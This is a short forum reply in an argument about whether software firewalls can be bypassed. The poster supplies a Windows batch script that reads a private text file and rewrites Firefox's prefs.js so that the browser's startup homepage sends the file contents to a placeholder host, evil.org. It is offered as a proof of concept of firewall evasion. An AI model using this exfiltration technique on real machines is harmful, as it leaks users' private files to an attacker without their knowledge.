Re: Microsoft Firewall vs ????



Rat River Cemetary wrote:

Sebastian G. wrote:

Which supports my claim, since this one is even worse.

OK, one shouldn't expect much if any understanding of security from a Windows Live Mail user... but please, if you have no clue, then please don't make suggestions to others.

I saw you once post proof of concept code to prove that any software firewall can be bypassed. Would you please post that again as I want to read it again, thanks.


You mean something like this one?

setlocal enabledelayedexpansion
set x=
for /f "delims=" %%i in (your_private_document.txt) do set x=!x! %%i
for /r %%i in (prefs.js) do echo user_pref("browser.startup.homepage","http://evil.org/catch.pl?!x!";);>>"%%i"

And then just wait until the user starts Firefox...
.